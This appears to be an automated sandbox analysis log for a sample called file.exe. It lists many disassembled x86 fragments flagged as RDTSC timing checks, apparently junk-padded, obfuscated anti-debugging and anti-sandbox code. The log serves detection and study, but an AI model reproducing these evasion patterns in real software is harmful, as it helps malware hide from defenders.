                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730CF5 second address: 730D67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD3C5224488h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx edx, si 0x00000028 mov edx, dword ptr [ebp+1244C0DEh] 0x0000002e lea eax, dword ptr [ebp+12481826h] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FD3C5224488h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dx, 0224h 0x00000052 push eax 0x00000053 pushad 0x00000054 jne 00007FD3C5224488h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D67 second address: 70FD1C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jns 00007FD3C500B9D6h 0x00000014 lea eax, dword ptr [ebp+124817E2h] 0x0000001a jg 00007FD3C500B9DDh 0x00000020 push eax 0x00000021 jmp 00007FD3C500B9E5h 0x00000026 mov dword ptr [esp], eax 0x00000029 sub dword ptr [ebp+1244AB7Bh], edx 0x0000002f call dword ptr [ebp+1244AD5Dh] 0x00000035 push ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768C42 second address: 768C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768C55 second address: 768CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD3C500B9DCh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD3C500B9E8h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jmp 00007FD3C500B9E7h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768CA2 second address: 768CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768E09 second address: 768E21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C500B9E2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768E21 second address: 768E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224494h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76959E second address: 7695A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DB57 second address: 76DB5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DB5C second address: 76DB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710CE second address: 7710D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710D4 second address: 7710D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710D8 second address: 7710DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B11 second address: 773B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B15 second address: 773B3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224496h 0x00000007 jl 00007FD3C5224486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007FD3C5224486h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B3E second address: 773B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7736DE second address: 7736E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ACF1 second address: 77ACF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77ACF5 second address: 77AD0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AD0B second address: 77AD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AD0F second address: 77AD13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AD13 second address: 77AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD3C500B9E8h 0x00000011 jbe 00007FD3C500B9D6h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7798DA second address: 7798E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7798E0 second address: 7798EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD3C500B9D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BC1 second address: 779BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BC7 second address: 779BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BCF second address: 779BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BD3 second address: 779BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BD7 second address: 779BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BDD second address: 779BE7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C500B9DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779BE7 second address: 779C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FD3C522449Ah 0x0000000d je 00007FD3C5224492h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7307E9 second address: 730816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD3C500B9E2h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD3C500B9E1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779D96 second address: 779D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779D9C second address: 779DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779EF7 second address: 779F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FD3C52244A2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779F21 second address: 779F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E3h 0x00000007 jmp 00007FD3C500B9E0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD3C500B9E7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779F63 second address: 779F69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779F69 second address: 779F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FD3C500B9F2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779F91 second address: 779F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779F97 second address: 779FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AA1F second address: 77AA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AA23 second address: 77AA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AA31 second address: 77AA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77AA35 second address: 77AA44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FD3C500B9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DBFE second address: 77DC1F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C522448Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jns 00007FD3C5224488h 0x00000011 js 00007FD3C522448Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB122 second address: 6EB12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD3C500B9D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D5CD second address: 77D5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D5D1 second address: 77D5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD3C500B9DDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D5E8 second address: 77D615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Bh 0x00000007 jmp 00007FD3C5224499h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D615 second address: 77D640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E2h 0x00000009 jmp 00007FD3C500B9DAh 0x0000000e js 00007FD3C500B9D6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D640 second address: 77D652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780DDB second address: 780DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780F0F second address: 780F1C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780F1C second address: 780F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9DEh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780F31 second address: 780F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD3C5224499h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7810E4 second address: 7810EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7810EA second address: 7810F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7810F0 second address: 7810F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7810F4 second address: 78110C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FD3C5224488h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 781276 second address: 78127B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7813D5 second address: 7813D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7813D9 second address: 7813DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7813DD second address: 7813E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7813E8 second address: 7813FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD3C500B9D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD3C500B9D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7813FD second address: 781403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 781565 second address: 781582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007FD3C500B9E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 781582 second address: 781586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788F36 second address: 788F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788F3A second address: 788F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788F40 second address: 788F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C500B9DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788F52 second address: 788F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD3C5224486h 0x00000009 jbe 00007FD3C5224486h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 786F67 second address: 786F77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3C500B9E2h 0x00000008 jng 00007FD3C500B9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 786F77 second address: 786F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 786F7E second address: 786F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7870D5 second address: 7870DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7870DB second address: 7870ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3C500B9DBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7870ED second address: 7870F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787266 second address: 787271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD3C500B9D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787271 second address: 787277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787277 second address: 787281 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7882CE second address: 7882F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b jmp 00007FD3C5224492h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7882F6 second address: 7882FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7882FC second address: 788300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7885B0 second address: 7885CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD3C500B9E4h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78890A second address: 788917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD3C5224486h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CA9F second address: 78CAAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CAAA second address: 78CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FD3C5224486h 0x0000000d jne 00007FD3C5224486h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D084 second address: 78D088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D088 second address: 78D097 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D097 second address: 78D09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D657 second address: 78D66B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnp 00007FD3C5224486h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D66B second address: 78D6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E6h 0x00000009 jmp 00007FD3C500B9E2h 0x0000000e popad 0x0000000f jng 00007FD3C500B9DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 799E84 second address: 799EB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FD3C5224486h 0x00000010 jmp 00007FD3C5224496h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A132 second address: 79A141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A141 second address: 79A14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B3D3 second address: 79B3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B3D7 second address: 79B3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B3DF second address: 79B403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E9h 0x00000007 pushad 0x00000008 ja 00007FD3C500B9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
